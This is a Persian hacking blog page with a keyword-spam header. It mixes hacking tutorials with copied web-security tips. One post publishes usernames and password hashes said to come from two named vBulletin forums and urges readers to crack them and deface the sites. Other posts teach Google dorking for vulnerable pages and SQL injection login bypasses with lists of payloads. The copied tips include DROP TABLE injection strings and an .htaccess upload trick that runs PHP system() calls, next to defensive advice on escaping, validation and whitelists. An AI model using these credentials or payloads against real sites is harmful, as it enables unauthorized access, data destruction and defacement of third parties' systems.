<body>
<a href="http://facefa.com">جامعه مجازی</a>
<h1><a href="http://facefa.com">شبکه اجتماعی</a><strong>هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی</strong> <a href="http://coo.ir">ثبت دامنه</a><strong>هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی</strong></h1><h2><strong> </strong><strong> </strong></h2><h1> هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی</h1><p><a href="http://bug.coo.ir"><strong>هک سایت شل آموزش باگ دیفیس باگ پرایوت دامین هاست پرسش وپاسخ دانلود برنامه سریال نامبر برنامه نویسی</strong></a> <a href="http://www.coo.ir" >free domain</a>جامعه مجازی، شبکه اجتماعی، دوست یابی، دوستیابی، ثبت دامنه، ثبت دامین</p>
<UL><LI><a href="http://zer0-0ne.blogfa.com/post-117.aspx" target="_blank">تو خدمت میشین پیشییییییییییییییییییییییییییییییییییییییی</a><BR> </P>
<P> </P>
<P> </P>
<P> </P>
<P align=center><FONT face="arial, helvetica, sans-serif" color=#33ff00 size=7>دوستون دارم</FONT></P>
<P align=center><IMG alt="pussi puss pishi 'vfi shereck" hspace=0 src="http://tbn0.google.com/images?q=tbn:EOP7aZCza4IRuM:http://blogs.sun.com/blu/resource/PussBoots.jpg" align=baseline border=5></P>
<P align=center> </P>
<P align=center> </P>
<P align=center>بلی بای</P>
<P align=center><IMG height=18 src="http://blogfa.com/images/smileys/04.gif" width=18></P>
<P align=center> </P>
<P align=center> </P></LI><LI><a href="http://zer0-0ne.blogfa.com/post-116.aspx" target="_blank">salami be garmaye aftab </a><BR>سلام من 7 ماهه که خدمتم دیگه نیستم که آپ کنم یا جواب بدم اما میای حالی بپرس خوشحال میشیم
</LI><LI><a href="http://zer0-0ne.blogfa.com/post-115.aspx" target="_blank">user and pass hacking by zer0-0ne هک 2 سایت ویبالتین</a><BR> vbulletin <BR/><BR/>u:<BR/>MrCool<BR/>pass:<BR/>9f159a37cc00fa1e7042db88bee44d5d<BR/>http://dienanh.net/forums/<BR/><BR/>u:<BR/>EDRA<BR/>pass:<BR/>59039f281686bb2f42398775e48d996e<BR/>http://www.edra.ntua.gr/forum/<BR/><BR/>حالا هی نظر نده برو سرزر رو بزن اگه با زون اچ حال میکنی سبت کن که فکر نکنن خبریه<BR/></LI><LI><a href="http://zer0-0ne.blogfa.com/post-114.aspx" target="_blank">گوگل هکینگ</a><BR> </P>
<P align=center><FONT face="arial, helvetica, sans-serif" color=#ffff00 size=7>گوگل هکینگ</FONT></P>
<P> <BR>خوب سلام دوستان می خواستم به شما روش هک سایت به روش rfi را آموزش بدهم گفتم اول بهتر است کمی با گوگل هکینگ آشنا شوید<BR>خوب من چند تا از دستورات کاربردی گوگل را می گویم که واقآ اگر روش صحیح کارکردن با این ها را درک کنید میتوانید هر فایل حتی فایلهایی private , و هر چیزی که فکرش را بکنید پیدا کنید . من خودم با گوگل ایمیل هایی مخفی در سایتها را پیدا کردم بعدآ روش پیدا کردن این چیزها هم یاد میدهم</P>
<P>جست وجوی حرفه ای با موتور جست وجوی گوگل</P>
<P><BR><= Intext: این دستور کاملآ مخالف intitle است و جست و جو بیشتر the body text یا همان محتوای سایت است برای بیشتر فهمیدن شما درباره این دستور من یک مثال خیلی ساده را می گویم<BR>اگر شما برای واژه های html جست و جو میکنید و شما نمیخواهید نتیجه را به این <A href="http://www.mysite.com/index.html">www.mysite.com/index.html</A> شکل ببینید فقط کافی است به این شکل بنویسید .intext:html</P>
<P><BR>: Link= > این دستور برای زمانی کاربرد دارد که شما میخواهید ببینید که چه سایت هایی به سایت مورد نظر شما لینک داده اند برای مثال : link:http://www.yahoo.com این دستور تمام سایتهایی که با سایت یاهو مرتبط هستند را به شما نشان میدهد </P>
<P>: Site= > این گزینه هم کاربرد زیادی دارد این را با یک مثال ساده میگویم به عنوان مثال من میخواهم در سایت ebay کتاب ها را برای خرید پیدا کنم پس در گوگل به این شکل زیر جست و جو میکنم</P>
<P>Site :www.ebay.com intitle:books </P>
<P><BR>" " =< خوب این جستو جو را ففط به محتوایی که در داخل این کوتیشنها است محدود میشود مثال :<BR>"Mark Twain" این فقط به دنبال سایتهایی میگردد که کلمه mark Twain در آن بکار رفته است</P>
<P>علامت + =< این علامت برای الحاق چند جست و جو کاربرد دارد یکی از کاربردش را در دستور بعد نشان دادم</P>
<P> </P>
<P> </P>
<P>:phonebook = > اگر بخواهید شماره تلفن و بیوگرافی شخصی خارجی را پیدا کنید از این دستور به شکل زیر استفاده میکنید<BR>"Phonebook:lisa+ca <BR>خوب این به دنبال تمام اشخاصی که اسمشان lisa , و در کشور کانادا هستند میگردد (ca مخفف کلمه کانادا است ) من یک لیست از پسوندها کشور ها را اینجا میذارم شاید مفید باشد <BR>Australia .au</P>
<P>Indonesia .id</P>
<P>India .in</P>
<P>Japan .jp</P>
<P>Israel .il</P>
<P>Britain .uk<BR>.us unitated state </P>
<P><BR>Inurl: = > خوب این دستور هم کاربرد زیادی دارد برای هک . این دستور می آید در url سایت جست وجو میکند مثال : inurl:passwd به دنبال سایتهایی میگردد که در url آن ها کلمه passwd بکار رفته است به این شکل <A href="http://www.site.com/passwd">www.site.com/passwd</A></P>
<P>:Filetype = این دستور برای جست و جوی پسوند فایلی که میخواهیم است مثال <BR>Filetype:pdf site:www.book.net<BR>این می اید در سایت book.net به دنبال تمام فایلها با پسوند pdf میگردد و به ما نشان میدهد <BR>و چند تا دستور دیگر با نام related و cache و index.of (که دستور اصلی گوگل نیست و فقط هکرها بکار میبرند برای پیدا کردن قسمتهایی آسیب پذیر سایت )<BR>اما اگر دوستان خواستند این چند تا هم می گویم موفق باشید <BR>__________________<BR>*********Never let school get in the way of learning*********** <BR> </P>
<P>نظر بده با سوات</P>
<P> </P></LI><LI><a href="http://zer0-0ne.blogfa.com/post-113.aspx" target="_blank">آموزش اس کیو ال </a><BR> </P>
<P>مقاله ماملي نيست ! اما به زودي PDF هاي كاملي رو براتون قرار ميدم ! اينو بخونيد يه آمادگي ذهني داشته باشيد تا اصلي ها بياد ! </P>
<P> </P>
<P>SQL یک زبان ساختار یافته ی متنی است که در سرويس دهنده ی وب مايکروسافت (IIS) استفاده ميشود و يکی از پر استفاده ترین نوع بانکهای اطلاعاتی است. در بانکهای اطلاعاتی، اطلاعاتی از قبیل User Name ها و Password ها، اطلاعات کاربران و ... نگهداری میشوند.</P>
<P>واحد اجرايی در SQL ها Query ها هستند.</P>
<P>Query چیست؟</P>
<P>مجموعه ای از عبارات است که با آنها میتوان با بانک اطلاعاتی به تبادل اصلاعات پرداخت. و ما بايد با فرستادن آنها بر روی سرور از طريق به اهداف خود برسيم.</P>
<P> </P>
<P>کدهای زیر را یک طراح وب برای یک سیستم ورود بوسیله SQL و ASP نوشته است.</P>
<P><BR>Login.html</P>
<P> </P>
<P><html></P>
<P><body></P>
<P><form method=get action="login_page.asp"></P>
<P><input type="text" name="login_name"></P>
<P><input type="text" name="pass"></P>
<P><input type="submit" value="sign in"></P>
<P></form></P>
<P></body></P>
<P></html></P>
<P> </P>
<P>login_page.asp</P>
<P> </P>
<P><@language="vbscript"></P>
<P><%</P>
<P>dim conn,rs,log,pwd</P>
<P>log=Request.form("login_name")</P>
<P>pwd=Request.form("pass")</P>
<P> </P>
<P>set conn = Server.CreateObject("ADODB.Connection")</P>
<P>conn.ConnectionString="provider=microsoft.jet.OLED B.4.0;data source=c:\folder\multiplex.mdb"</P>
<P>conn.Open</P>
<P>set rs = Server.CreateObject("ADODB.Recordset")</P>
<P>rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn</P>
<P>If rs.EOF</P>
<P>response.write("Login failed")</P>
<P>else</P>
<P>response.write("Login successful")</P>
<P>End if</P>
<P>%></P>
<P> </P>
<P>همانطور که مشاهده کرديد طراح وب دو صفحه را طراحی کرده است:</P>
<P>1- صفحه login.html که username و password کاربر از آنجا گرفته میشود.</P>
<P>2- صفحه ای که در آن username و password وارد شده با اطلاعات داخل Data Base مقایسه میشود و در صورت وجود داشتن username و password در Data Base مقایسه میشود و در صورت درست بودن آنها پیغام درست بودن آنها داده میشود و در غیر این صورت پیغام درست نبودن آنها داده میشود.</P>
<P>اگر query ما به صورت زیر باشد، ما ميتوانيم از بخش ورود با موفقيت عبور کنيم.</P>
<P>Username : admin</P>
<P>Password : admin’ or a</P>
<P> </P>
<P>Username : admin</P>
<P>Password : admin’ or a=a --</P>
<P> </P>
<P>حال چرا اين اتفاق می افتد؟</P>
<P>در مثال بالا نفوذگر از یک روش ساده برای نفوذ استفاده کرده است. او کلمه کاربر را وارد و در محل ورود کلمه عبور عبارت Admin’ or a=a را وارد می کند. در اینجا بانک اطلاعاتی به بررسی آن خواهد پرداخت. شايد کلمه عبور admin نباشد اما نفوذگر از عبارت Or a=a نیز استفاده کرده است. این عبارت به این مفهوم است که کلمه عبور یا (admin) است و یا است.a که = a و بانک اطلاعاتی با مواجه شدن با این عبارت فرض ميکند کلمه عبور درست است و نفوذگر ميتواند به سیستم وارد شود.</P>
<P>نمونه های ديگری از مثال بالا:</P>
<P>admin" or "a"="a</P>
<P>admin" or 1=1 --</P>
<P>admin' or 1=1 --</P>
<P>admin' or 'a'='a</P>
<P>admin') or ('a'='a</P>
<P>admin") or ("a"="a</P>
<P>حال اگر هیچ کدام از این روشها کار نکرد چکار کنيم؟</P>
<P>ما وقتی می توانیم به طور موفقیت آمیز به یک سیستم نفوذ کنیم که دقیقا از نحوه طراحی بانک اطلاعاتی آن مطلع باشيم.</P>
<P>قسمت اصلی همين جاست. اگر خدا خواست در مقالات بعد به اين موضوع میپردازيم.</P>
<P> </P>
<P align=center>۱۹ خدمتم و دیگه آژ نمی گنم تا ۲ ماه</P>
<P align=center><IMG height=18 src="http://blogfa.com/images/smileys/23.gif" width=18><IMG height=18 src="http://blogfa.com/images/smileys/25.gif" width=18><IMG height=18 src="http://blogfa.com/images/smileys/06.gif" width=18><IMG height=18 src="http://blogfa.com/images/smileys/07.gif" width=18><IMG height=18 src="http://blogfa.com/images/smileys/05.gif" width=18></P></LI><LI><a href="http://zer0-0ne.blogfa.com/post-112.aspx" target="_blank">نكات امنيتي</a><BR><P align=center><IMG height=18 src="http://blogfa.com/images/smileys/04.gif" width=18></P>
<P align=center> </P>
<P align=right>تقويم شمسي جاوا اسكريپت ! <BR>نوشته شده توسط HamidRezaُ <BR>۲ مرداد ۱۳۸۶ <BR>تقويم شمسي جاوا اسكريپت !<BR>وقتي اين كلمه رو در گوگل جستجو ميكردم برام يه اميدي بوجود ميومد كه انگار يه چيزي پيدا شده اما وقتي به اون سايت مراجعه ميكردم متوجه ميشدم كه منظورش فقط چاپ تاريخ همون روز روي صفحه هست . مثلا چهارشنبه 2 مرداد 1386 .<BR>خيلي زود متوجه شدم كه بايد حسرت تقويم شمسي تحت وب رو بخورم و در واقع چنين چيزي وجود نداشت .</P>
<P align=right>در حال حاضر با خوشحالي وصف ناپذير به اطلاع ميرسانم كه تقويم شمسي تحت وب از اين پس وجود خارجي داره .<BR>اين تقويم از يك نمونه كه داشتم و يك فايل ديگه كه تاريخ شمسي داشت ساخته شده .<BR>به هيچ وجه مشخص نيست كه اين فايلها توسط چه كسي ايجاد شده و هيچ قانون استفاده اي هم ندارن اما من به عنوان انتشار دهنده نسخه نهايي ‘ فايل رو با مجوز استفاده رايگان براي تمام پروژه هاي اپن سورس انتشار ميدم .<BR>از لحاظ كاركرد مشكل خاصي نيست اما از لحاظ امكانات خيلي دلم ميخواد كه همانند تقويم ميلادي جوملا بشه .</P>
<P align=right> </P>
<P align=right>من فعلا يه نسخه كمپرس شده اون رو فقط براي تست گذاشتم اما فقط براي تست استفاده كنيد تا در صورت وجود مشكل منطقي اون رو حل كنيم .<BR>در صورتي كه همين حالا نياز به نسخه كمپرس نشده داريد ميتونيد از سايت من دريافت كنيد .<BR>در ضمن خيلي دلم ميخواد به صورت يك پروژه گروهي كار بشه و با PHP ارتباط داده بشه و همچنين با MySQL كه بشه مثلا آرشيو اطلاعات رو با اين فيلد فيلتر كرد .<BR>چيزي كه واقعا به درد همه خواهد خورد و به درد همه CMS ها و سايتها و سيستمها ميخوره .</P>
<P align=right>براي ديدن نمونه تقويم اينجا رو كليك كنيد .<BR>اين تقويم با مرورگهاي به درستي كار ميكنه :<BR>Firefox<BR>Opera<BR>IE<BR>Safari</P>
<P align=right>براي ادامه بحث به اين تاپيك مراجعه كنيد و نظرات شخصي خودتون رو در اينجا مطرح كنيد .<BR> <BR>آخرين بروز رساني ( ۴ مرداد ۱۳۸۶ ) <BR> <BR>سلسله نکات امنیتی نکته شماره #3 <BR>نوشته شده توسط رامین فرمانی <BR>۸ تیر ۱۳۸۶ </P>
<P align=right>نکته امنیتی شماره سوم حملات موسوم به<BR>SQL Injection </P>
<P align=right>پیش از هر چیز سعی میکنم تعریفی از SQL Injection بياورم اين خيلي مهمه كه بدونيم معني اين كلمه چيست اين واژه به معناي تزريق SQL هست و خوب فکر می کنم دیگه حالا بشه حدس زد که این یعنی چی. یعنی اینکه یک کسی یک طوری یک چیزی رو به یک پایگاه داده SQL تزريق مي كنه تزريق هميشه يادآور اينه كه ماده اي خارجي كه از جنس مقصد نيست به اون وارد مي شه و اين واقعا همون چيزيه كه اتفاق ميفته حالا با بیانی ساده آغاز میکنیم و به سراغ این میرویم که اگر برنامههای ما در مقابل این نوع حملات ضعف داشته باشند چگونه میتوانند مورد حمله واقع شوند.</P>
<P align=right>در واقع سه نوع حمله از اين دست وجود دارند كه دوتا از اونها مد نظر ما هستند</P>
<P align=right>1- حملاتي كه ناشي از اشتباه در فيلترينگ گريزكاركترها(escape characters)هستند</P>
<P align=right>2- حملاتی که ناشی از اشتباه در نوع داده هستند</P>
<P align=right>3- حملاتی که به حفره های ذاتی پایگاه های داده مربوط میشوند</P>
<P align=right>پر واضح است که دو دسته اول مدنظر ماست که ادامه به بررسی اونها خواهیم پرداخت.</P>
<P align=right>خوب اجازه بدهید در مورد اولی مثالی ببینیم</P>
<P align=right> </P>
<P align=right>[code]</P>
<P align=right>mysql_query('SELECT * FROM user WHERE username = "' . $_GET['username'] . '");</P>
<P align=right>[/code]</P>
<P align=right>همونطوری که مشاهده می کنیم مانند همیشه خیلی عادی دارید نام کاربری که کاربر براتون با متد GET پست كرده رو جستجو مي كنيد كه اگر يافت كرديد به اون كاربر اجازه ورود بديد هدفمون اصلا اين نيست كه اين كد رو پيچيده كنيم مثلا شما با خودتون بگين كه اگر من باشم حتما با POST می فرستم و حتما پسورد را هم چک می کنم و حتما پسورد را دوبار md5 مي كنم زيرا كه اصلا حفره در اينجا نيست تصور كنيد كه يك نفوذگر(نه هکر) چنين چيزي را ارسال كند:</P>
<P align=right> </P>
<P align=right>' OR '1'='1 </P>
<P align=right> </P>
<P align=right>و نتیجه نهایی در پرس و جوی SQL چنين مي شود</P>
<P align=right> </P>
<P align=right>mysql_query('SELECT * FROM user WHERE username = "' . ' OR '1'='1 . '");</P>
<P align=right> </P>
<P align=right>خوب حالا نظرتون چیه!</P>
<P align=right>می دونین مشکل اینجاست که قضیه به این سادگی ها هم ختم نمی شه و می شه یک نفوذگر ماهر ده ها مورد دیگر رو هم مورد استفاده قرار بده بطور مثال:</P>
<P align=right> </P>
<P align=right>a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% </P>
<P align=right> </P>
<P align=right>که نتیجه تعصف برانگیز</P>
<P align=right> </P>
<P align=right>mysql_query('SELECT * FROM user WHERE username = "' . a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% </P>
<P align=right> . '");</P>
<P align=right> </P>
<P align=right>را به همراه خواهد داشت موارد دیگر مانند بوجود آوردن خطاها و گرفتن اطلاعات بدست آوردن نسخه پایگاه داده اجرا کردن کدها و مباحث پیشرفته SQL Injection رو نام برد كه در هر مورد سخنان زيادي مي شه گفت حالا اجازه دهيد كه به سراغ حفره دوم برويم :</P>
<P align=right>mysql_query("SELECT * FROM user WHERE id = " + variable + ";");</P>
<P align=right>واضح است که برنامه نویس در اینجا انتظار دارد که متغیری عددی در جای variable وارد گردد حال اگر بدون كنترل كردن نوع داده اين كد را در اختيار كاربران بگذارد به چنين چيزي روبرو مي شود</P>
<P align=right>1;DROP TABLE users</P>
<P align=right>و احتمالا دیگر نیازی نیست که بگویم بعدا چه اتفاقی خواهد افتاد خوب حالا چه باید کرد؟</P>
<P align=right>حقیقت این است که اگر حفره های امنیتی عموما کابوسی وحشت ناک بشمار می آیند اما پیش گیری از آنها بسیار ساده است دو کد برای شما ذکر می کنم که منبع اون ها یکی از سایتهایی بود که چند وقت پیش در این زمینه مطالعه می کردم و الان آدرس اونها در ذهنم نیست</P>
<P align=right>در مورد حفره اول تابعی را می نویسیم که بسیار ساده و در عین حال محکم و قابل اعتماد است</P>
<P align=right>function sql_quote( $value )</P>
<P align=right>{</P>
<P align=right> if( get_magic_quotes_gpc() )</P>
<P align=right> {</P>
<P align=right> $value = stripslashes( $value );</P>
<P align=right> }</P>
<P align=right> //check if this function exists</P>
<P align=right> if( function_exists( "mysql_real_escape_string" ) )</P>
<P align=right> {</P>
<P align=right> $value = mysql_real_escape_string( $value );</P>
<P align=right> }</P>
<P align=right> //for PHP version < 4.3.0 use addslashes</P>
<P align=right> else</P>
<P align=right> {</P>
<P align=right> $value = addslashes( $value );</P>
<P align=right> }</P>
<P align=right> return $value;</P>
<P align=right>} </P>
<P align=right>و نحوه استفاده از اون هم بسیار ساده است</P>
<P align=right>$username = $_POST['username'];</P>
<P align=right>query = "SELECT * FROM users WHERE username='" . sql_quote($username) . "'"; </P>
<P align=right> </P>
<P align=right>در مورد نکته دوم هم که کلاس امیرمحمد عزیز رو مورد استفاده قرار دادم که یکی از مجموعه های بدرد بخور PEAR هست و به آدرس <A href="http://pear.php.net/package/Validate">http://pear.php.net/package/Validate</A> می تونین اون رو دریافت کنین و آدرسی که در کد هست رو به مسیر دلخواهی که این فایل درون قرار داره تغییر بدین</P>
<P align=right> </P>
<P align=right>//init validate object</P>
<P align=right>include_once('your_path_to_pear_directory/Validate.php');</P>
<P align=right>$validate = &new Validate();</P>
<P align=right> </P>
<P align=right>//get POST variables</P>
<P align=right>$username = $_POST['username'];</P>
<P align=right>$email = $_POST['email'];</P>
<P align=right>$age = $_POST['age'];</P>
<P align=right> </P>
<P align=right>//validate username, only alphanumeric and space characters are allowed</P>
<P align=right>//VALIDATE_ALPHA, VALIDATE_NUM, VALIDATE_SPACE constants are defined in Validate class.</P>
<P align=right>if( !$validate->string( $username, array('format'=>VALIDATE_ALPHA . VALIDATE_NUM . VALIDATE_SPACE ) ) )</P>
<P align=right>{</P>
<P align=right> //throw some username error</P>
<P align=right>}</P>
<P align=right>//validate email</P>
<P align=right>if( !$validate->email( $email ) )</P>
<P align=right>{</P>
<P align=right> //throw some email error</P>
<P align=right>}</P>
<P align=right>//validate age, only numbers between 0 and 100 are allowed</P>
<P align=right>if( !$validate->number( $age, array( 'min'=>0, 'max'=>100 ) ) )</P>
<P align=right>{</P>
<P align=right> //throw some age error</P>
<P align=right>} </P>
<P align=right>خوب حالا چند مورد اضافی هم باید ذکر کنم در مورد کد اول چند تابع می بینید که برای پاسخ به حس کنجکاوی شما توضیحی براشون نمیارم ولی در پایگاه های داده گوناگون توابع در نظر گرفته شده تقریبا به همین شکل هستند<BR>MySQL: mysql_real_escape_string()<BR>PostgreSQL: pg_escape_string()<BR>SQLite: sqlite_escape_string()</P>
<P align=right>راه حل خوب دیگری که حتما باید ذکر گردد استفاده از PDO است كه در اينجا مجالي براي شرح آن نیست و توضیحاتی در این زمینه را می تونین در </P>
<P align=right><A href="http://ir2.php.net/pdo">http://ir2.php.net/pdo</A></P>
<P align=right>و</P>
<P align=right><A href="http://www.devshed.com/c/a/PHP/Using-PDO-Objects-in-PHP-5/">http://www.devshed.com/c/a/PHP/Using-PDO-Objects-in-PHP-5/</A></P>
<P align=right>مشاهده کنید مورد سوم که شخصا شدیدا اون رو توصیه که نه دستور می دهم استفاده از DAL هاست كه شخصا پيشنهادم PEAR::MDB2 هست اما هر سه گزينه زير قابل تامل و بدرد بخور هستند</P>
<P align=right>AdoDB: <A href="http://adodb.sourceforge.net/">http://adodb.sourceforge.net/</A></P>
<P align=right>PEAR::MDB2: <A href="http://pear.php.net/package/MDB2">http://pear.php.net/package/MDB2</A></P>
<P align=right>Zend_Db: <A href="http://framework.zend.com/manual/en/zend.db.html">http://framework.zend.com/manual/en/zend.db.html</A><BR>آخرين بروز رساني ( ۱۰ تیر ۱۳۸۶ ) <BR> <BR>سلسه نكات امنيتي نكته شماره #2 <BR>نوشته شده توسط رامین فرمانی <BR>۸ خرداد ۱۳۸۶ <BR>سلسه نكات امنيتي نكته شماره #2<BR>نكته امنيتي امروز ما مربوط ميشود به يكي از مهمترين و حساسترين ابزارهاي امنيتي، نوعي حمله مربوط به آن و روش پيشگيري از اين حمله به شكلي صحيح خوب همانطور كه شايد برخي از شما حدس زدهايد امروز ميخواهيم در رابطه با جلسهها(Session) باهم صحبت كنيم:<BR>يكي از حملات بسيار مرسوم در مجموعه حملات شناخته شده تحت وب حمله موسوم به Session fixation هست كه نفوذگر در طي آن سعي دارد با شبيه جلوه دادن خود به كاربران به اطلاعات موجود در جلسه آنها دسترسي يابد. مهمترين و حساسترين اطلاعات براي نفوذگر در اين شرايط چيست؟ خوب همانطور كه احتمالاً شما هم ميدانيد Session ID هسته اصلي اين نوع نفوذ خواهد بود در واقع Session ID كليدي است كه ميتوان باداشتن آن ثابت نمود كه من كاربر X و شما كاربر Y هستيد و حالا اگر من كليد شما را به طريق بدست بياورم ميتوانم خودم را جاي شما جابزنم و...<BR>خوب پس از اين مقئمه براي دوستاني كه ميخواهند كمي بيشتر درمورد Session Fixation اطلاعات كسب كنند مرجع هميشگيمان <A href="http://www.wikipedia.com">http://www.wikipedia.com</A> را پيشنهاد ميدهم كه ميتوانيد توسط <A href="http://en.wikipedia.org/wiki/Session_fixation">http://en.wikipedia.org/wiki/Session_fixation</A> مستقيم به تارنماي دايرة المعارف ويكيپديا بخش مربوط به session fixation متصل گريدد.<BR>خوب تا ايجا متوجه شديم كه برروي هاستهاي مشترك خطري با چنين محتوي نرمافزار ما را تهديد مينمايد اما به واقع چگونه ميتوان از چنين حفرههايي پشتيباني كرد و راه عبور را بر نفوذگران بست، ساده است چنانچه دائما احتمال به سرقت رفتن كليد خانه شما وجود داشته باشد شما چهميكنيد خوب واضح است كليد را دائماً عوض ميكنيد در اينجا نيز ما چنين ميكنيم:</P>
<P align=right><BR><?php<BR>session_start();<BR>if (!isset($_SESSION['initiated']))<BR>{<BR>session_regenerate_id();<BR>$_SESSION['initiated'] = true;<BR>}<BR>?></P>
<P align=right><BR>اما نكتهاي در اينجا مطرح ميشود و آن اينكه با رفتن به آدرس اين صفحه در شاخه (پيش فرض) /tmp شما چنين چيزي مشاهده خواهد شد:<BR>sess_82c6980017e100277a63983142fd454c<BR>sess_a4bab88e6dfa6e900ade21e3fbd27a53<BR>و اگر مجدداً صفحه را اجرا نمائيد:<BR>sess_984c5230acca90b5a75eddb89bb48354<BR>sess_a4bab88e6dfa6e900ade21e3fbd27a53<BR>sess_82c6980017e100277a63983142fd454c<BR>و مجدداً:<BR>sess_984c5230acca90b5a75eddb89bb48354<BR>sess_a4bab88e6dfa6e900ade21e3fbd27a53<BR>sess_82c6980017e100277a63983142fd454c<BR>sess_dd88c05b724d80b30c90309847f2e919<BR>براي اجتناب از چنين وضعيتي كافيست تا كد خود را به اين شكل اصلاح نمائيد:</P>
<P align=right><BR><?php<BR>session_start();<BR>if (!isset($_SESSION['initiated']))<BR>{<BR>$_SESSION['initiated'] = true;<BR>session_regenerate_id(true);<BR>}</P>
<P align=right>?></P>
<P align=right> </P>
<P align=right>آخرين بروز رساني ( ۱۰ خرداد ۱۳۸۶ ) <BR> <BR>چند تذکر <BR>نوشته شده توسط آرش ميکائيلی <BR>۷ خرداد ۱۳۸۶ <BR>سلام دوستان </P>
<P align=right>طی هفته های گذشته مسائلی پیش آمده که لازم دیدم این تذکرات را در صفحه اول مطرح کنم:</P>
<P align=right>1. تعدادی پست با محتوی مربوط به استفاده غیر مجاز (Crack) از نرم افزار های موجود در بازار داشتیم که متاسفانه بعضا از طرف اعضای قدیمی سایت بود. <BR>از همه دوستان خواهش می کنم که از ارسال چنین مطالبی خودداری کنن، چرا که در صورت ارسال چنین مطالبی پست توسط مدیران سایت حذف می شود و شناسه کاربری ارسال کننده پست بسته خواهد شد.</P>
<P align=right>2. من و سایر مدیران سایت روزانه تعداد زیادی email در رابطه با در خواست کمک در مسائل فنی دریافت می کنیم، لطفا توجه داشته باشید که به هیچ یک از این سوالات پاسخ داده نخواهد شد و فقط به سوالات مطرح شده در انجمنها رسیدگی می شود.</P>
<P align=right>3. تعداد زیادی پست تکراری و غیر میربوط با عنوان انجمن مطرح شده؛ از همه دوستان خواهش می کنم که در زمان ارسال دقت بیشتری داشته باشن.</P>
<P align=right>در پایان لازم میدونم از امیر محمد سعید و رامین فرمانی برای زحماتی که برای IranPHP می کشن تشکر کنم.</P>
<P align=right>با آرزوی موفقیت همه دوستان<BR>آرش<BR> <BR> <BR>سلسله نكات امنيتي نكته شماره #1 <BR>نوشته شده توسط رامین فرمانی <BR>۱ خرداد ۱۳۸۶ <BR>نكته شماره #1<BR>هرزمان كه به كاربري اجازه بارگذاري Upload فايلي را ميدهيد امنيت سيستم شما به نقصان كشيده ميشود شايد چون بسياري از ديگر برنامه نويسان ساده لو با خود بگوئيد من از فهرست سياه blacklist براي كنترل پروندههاي ارسالي به ميزبانم استفاده مي كنم به عنوان مثال با كنترل كردن نوع فايل File Type اجازه ارسال پروندههايي با پسوند PHP را به كاربرانم نمي دهم حال يك هكر نه چندان با هوش چنين مي كند:<BR>پروندهاي با نام ".htaccess" را با محتوي :</P>
<P align=right>AddType application/x-httpd-php .php .htm .txt .bad</P>
<P align=right>بارگذاري ميكند حال كافيست تا دريك پرونده با پسوند .htm و يا .txt ويا .bad كدي مانند :</P>
<P align=right><?php<BR>echo system("locate config");<BR>?></P>
<P align=right>قرارداده آنرا نيز برروي ميزبان شما بارگذاري نمايد...<BR>پس خوب دقت كنيد همواره همواره و همواره پروندههاي ارسالي كاربران را توسط يك فهرست سفيد whitelist (بجاي فهرست سياه blacklist) آزمايش نمائيد.<BR>يدنيست همينجا با با يك PECL extension بسيار خوب و كارا آشنا بشيد:<BR>Fileinfo : اين اضافه هنوز در بسته PECL مي باشد اين اضافه با بررسي ساختار فايل ارسال (بدون توجه به نام وپسوند آن) نوع فايل را حدس ميزند صفحه خانگي رسمي اين اضافه در آدرس:</P>
<P align=right>lhttp://pecl.php.net/package/Fileinfo</P>
<P align=right>و مستندات آن در آدرس :</P>
<P align=right><A href="http://ir.php.net/manual/en/ref.fileinfo.php">http://ir.php.net/manual/en/ref.fileinfo.php</A><BR>آخرين بروز رساني ( ۵ خرداد ۱۳۸۶ ) <BR> <BR>پلاگین تاریخ جلالی برای Smarty <BR>نوشته شده توسط آرش همت <BR>۲۳ فروردین ۱۳۸۶ <BR>سلام شاید قبلا هم در مورد این پلاگین شنیده باشید. این پلاگین به شما این امکان را میدهد تا در تمام طول برنامه خود با تاریخهای میلادی یا unix timestamp کار کنید و تاریخها را در داخل فایل template برنامه به تاریخ جلالی به فرمت دلخواه تبدیل کنید. این پلاگین قادر به تبدیل تمامی فرمتهای تاریخ شامل unix timestamps و mysql timestamps و تمامی رشته هایی که توسط تابع strtotime در php قابل تفسیر میباشد است. در نسخه دوم پلاگین html_select_jdate هم به این مجموعه اضافه شده که به برنامه نویس امکان ایجاد dropdown های مورد نیاز برای دریافت تاریخ بصورت جلالی را با استفاده از تابع html_select_jdate در smarty میدهد. یک مقاله آموزشی نیز برای این پلاگین نوشته شده که بزودی در بخش مقالات قرار میگیرد.<BR> <BR>آخرين بروز رساني ( ۲۵ فروردین ۱۳۸۶ ) <BR> <BR>MySQL Native Driver for PHP <BR>نوشته شده توسط HamidReza <BR>۲۲ فروردین ۱۳۸۶ </P>
<P align=right>مدل جديد از درايور MySQL براي PHP تحت نسخه بتا انتشار داده شد .</P>
<P align=right>اين درايور كه mysqlnd نام دارد مخفف MySQL Native Driver مي باشد . MySQL Native Driver يك راه جديد و انتخابي براي اتصال PHP نسخه 5 و 6 هست به MySQL نسخه 4.1 به بالا و در واقع جايگزيني هست براي libmysql .</P>
<P align=right>بخشي از مشخصات جديد كه در نسخه 5.0.0-alpha اضافه شده و مهمترين اون اضافه شدن يونيكد هست به شرح زير مي باشد :</P>
<P align=right>· Support for Prepared Statements</P>
